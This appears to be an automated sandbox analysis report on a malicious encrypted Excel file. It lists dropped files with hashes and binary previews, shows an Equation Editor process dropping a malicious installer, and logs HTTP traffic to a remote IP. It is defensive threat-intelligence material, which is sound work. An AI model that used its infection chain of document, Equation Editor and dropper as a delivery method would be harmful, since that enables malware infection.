                                              Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                              Category:dropped
                                              Size (bytes):4396
                                              Entropy (8bit):7.884233298494423
                                              Encrypted:false
                                              SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                              MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                              SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                              SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                              SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                              Malicious:false
                                              Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):11303
                                              Entropy (8bit):7.909402464702408
                                              Encrypted:false
                                              SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                              MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                              SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                              SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                              SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                              Malicious:false
                                              Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):11303
                                              Entropy (8bit):7.909402464702408
                                              Encrypted:false
                                              SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                              MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                              SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                              SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                              SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                              Malicious:false
                                              Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3747
                                              Entropy (8bit):7.932023348968795
                                              Encrypted:false
                                              SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                              MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                              SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                              SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                              SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                              Malicious:false
                                              Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):67065
                                              Entropy (8bit):6.6304639756916615
                                              Encrypted:false
                                              SSDEEP:1536:/4hyDx26jHEn+GRp9RxjB6JG5ixTugnzsU:D9Vs1pTxV6JGsugzR
                                              MD5:270B01C8C789557B4D6DEEDFDB1050AD
                                              SHA1:3445451F85C3BD8824E984977A71268FA4F82240
                                              SHA-256:6A7FB12A3EE8E9F070024D4573FF1A058451179EC46A1AD2ABC8D2B704E82F37
                                              SHA-512:69ADFE79E91881FD1A075F57CC1B2B4EFC75FF464546AA8C52EE858B4ED70AF65E61946C952A848491A4CA0629A2E3C86A62DDF6A05DB56C1A35553D392A048F
                                              Malicious:false
                                              Preview:9......._f9.9..?.u.f9.......u.8.....u....8......9....u.....bg9....b.D-f9....(~..9.9.....8.9...R.>..f9......>..f9.S..u...8.8.Z8..1.9.9..4..BG..9......f9.9.u.8.9.W9.8......K...?.CG.S.^.s.y...w`.'.tn........9D..n\U.Xgz.,e..../..~...(..]#...i. ......=....1i.z.=..._UG..*..E.O*..R.....}|V.3qv%.w.7..e.J2q..'....cT..g..P+5..MA...7*S.[{..L......N.....%pb....8._4.........8...G...~./.d..:.m.Ax...............................................?..3:....G..UG..Pr................................................~.Pv.....................................................*.o........................................Rh.k............................................WD.9>z.k............................................Rk.k............................................RW.=.................................................{..>~F.BG..G.B...............................................{.=......................................................Y................................................?
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                              • Filename: SdEkI4IDqd.exe, Detection: malicious, Browse
                                              • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                              • Filename: cP5nXH8fQI.exe, Detection: malicious, Browse
                                              • Filename: BL Copy.doc, Detection: malicious, Browse
                                              • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                              • Filename: HealthSystray.exe, Detection: malicious, Browse
                                              • Filename: jqkuxbwi.exe, Detection: malicious, Browse
                                              • Filename: listing new.xlsx, Detection: malicious, Browse
                                              • Filename: Pnportd65.exe, Detection: malicious, Browse
                                              • Filename: Pnportd65.exe, Detection: malicious, Browse
                                              • Filename: PO-C - 20211213-PLATE.doc, Detection: malicious, Browse
                                              • Filename: new.xlsx, Detection: malicious, Browse
                                              • Filename: 8#Ub2e4).exe, Detection: malicious, Browse
                                              • Filename: eW8Jsngljx.exe, Detection: malicious, Browse
                                              • Filename: o4XzTr73Ut.exe, Detection: malicious, Browse
                                              • Filename: uDZovIdfEJ.exe, Detection: malicious, Browse
                                              • Filename: q6JYc6gWld.exe, Detection: malicious, Browse
                                              • Filename: fw8ex1BNek.exe, Detection: malicious, Browse
                                              • Filename: 16c6a61f609b7ef5cd13fc587805018efad3be4254591.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):23040
                                              Entropy (8bit):5.575148216618883
                                              Encrypted:false
                                              SSDEEP:384:A9zuL7jiVVvNORNHzTdXaP4osxlUoLYuC/NWiOCW:A8zc2RJdqP4oLoQ/8
                                              MD5:E1FA0E4751888A35553A93778A348A24
                                              SHA1:98667AE0AB2D955E69C365D62F2DD1A8C839E14E
                                              SHA-256:A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
                                              SHA-512:E93E62CC3FFBC2621FD87BD6DAEDF3699799217B49A006D4A891CDBFE4DD89B33DA258C6A4D8CC28FF615CC0F033D83BF761502169D05A6FC9CBC5FF5FC2ABF1
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p...p...p...y.7.d...d...s...p...K...d...v...d...q...d...v...d.[.q...d...q...Richp...........PE..L..................!.....<.......... ........P.....Q......................................@E........................P3.......`..................................X...`...T............................................`.......1.......................text...~;.......<.................. ..`.data...8....P.......@..............@....idata..D....`.......D..............@..@.didat..0....p.......N..............@....rsrc................P..............@..@.reloc..X............V..............@..B................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):23040
                                              Entropy (8bit):6.138116359523764
                                              Encrypted:false
                                              SSDEEP:384:4j1Pm6AenqNEb9jGvRtb30lEVybDPukC+Rfb6ql4PrxWpmWZr:xlMsP4l2ybJawRr
                                              MD5:3F305E85F2751C4AA1A4EFDF3240EDA6
                                              SHA1:FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9
                                              SHA-256:95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
                                              SHA-512:3BC1B150ACC164818C169448E7BCD8BEC7780278E60581E3A21722BE947BDF6016D7A99FB1F06E59057F71A3C965CD882CA974EAF288172D5285B1CEA93769C6
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.I...'...'...'.......'...$...'...#...'...&.B.'...&...'..."...'...'...'.......'......'...%...'.Rich..'.................PE..L.....{............!.....B..........pH.......`.......................................P....@A........................PQ......(q..........................................T...........................h................p..$............................text....A.......B.................. ..`.data........`.......F..............@....idata.......p.......H..............@..@.rsrc................R..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:CDFV2 Encrypted
                                              Category:dropped
                                              Size (bytes):191800
                                              Entropy (8bit):7.957948536702047
                                              Encrypted:false
                                              SSDEEP:3072:ri+vYKahh4qHgG0XHCoJVUEmX1j+jrbr9qfXeqHe4O0ViaAb2PxFSfzw4+MdEPvS:GpCqHqiJEmX1j2rbpAXeqdOrPbxCMc5E
                                              MD5:E96BAF78F2A98321AE47D4D82E608124
                                              SHA1:E9EA3B397B7C2D5BE07845745F621AEF0D8D4DB0
                                              SHA-256:180125C408724BB6EF0037C028439058D6F0B8326B679E02D7CBA8D24461C3BF
                                              SHA-512:A9320B25B8F28BFB93320A4D3D58C31DEBD94079D3902313429487DCED83E5E223481AC38DE4FCBC752D5C6C5B95F5B4B74A7DD03CFCA69C5C4523F3DE34D45C
                                              Malicious:false
                                              Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):170120
                                              Entropy (8bit):7.49730405573374
                                              Encrypted:false
                                              SSDEEP:3072:TbG7N2kDTHUpou0lvStHlquLNLb+tAGGTCXIQOKGDYq8rmIdaDm2ghplPd:TbE/HUMFSeKSWSIQOKGDwiIoDyhplV
                                              MD5:0DCB37FF90B93B7A3225707B1AF111B8
                                              SHA1:E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F
                                              SHA-256:4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
                                              SHA-512:AF5D2C9D6F3EEFEACE0E9F4907251F0EB80494988A607C40B4CDA1F0EA6EE23F1D888D12F9724F6BE16EAEBA52A46F6E79136EC3D4DA0410D6E034E629E091D6
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................|.....@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.957948536702047
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:7027521.xlsx
                                              File size:191800
                                              MD5:e96baf78f2a98321ae47d4d82e608124
                                              SHA1:e9ea3b397b7c2d5be07845745f621aef0d8d4db0
                                              SHA256:180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
                                              SHA512:a9320b25b8f28bfb93320a4d3d58c31debd94079d3902313429487dced83e5e223481ac38de4fcbc752d5c6c5b95f5b4b74a7dd03cfca69c5c4523f3de34d45c
                                              SSDEEP:3072:ri+vYKahh4qHgG0XHCoJVUEmX1j+jrbr9qfXeqHe4O0ViaAb2PxFSfzw4+MdEPvS:GpCqHqiJEmX1j2rbpAXeqdOrPbxCMc5E
                                              File Content Preview:........................>......................................................................................................................................................................................................................................
                                              Icon Hash:e4e2aa8aa4b4bcb4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 26, 2022 10:40:53.428663969 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.566884995 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.566993952 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.567604065 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.706120968 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.706151962 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.706163883 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.706176996 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.706288099 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.844465971 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844506025 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844528913 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844552040 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844574928 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844598055 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844609022 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.844620943 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844645023 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.844646931 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.844652891 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.844655991 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.844657898 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.844676018 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983169079 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983196020 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983218908 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983242989 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983264923 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983288050 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983310938 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983330965 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983335972 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983361959 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983406067 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983429909 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983432055 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983453035 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983455896 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983470917 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983475924 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983491898 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983499050 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983503103 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983520985 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.983530045 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.983549118 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.985578060 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.985764980 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:53.985835075 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:53.986990929 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.121912003 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.121941090 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.121958017 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.121974945 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.121990919 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122008085 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122025013 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122040033 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122044086 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122060061 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122076035 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122080088 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122080088 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122082949 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122097969 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122097969 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122113943 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122117043 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122127056 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122136116 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122148037 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122154951 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122169971 CET4916780192.168.2.2250.16.4.125
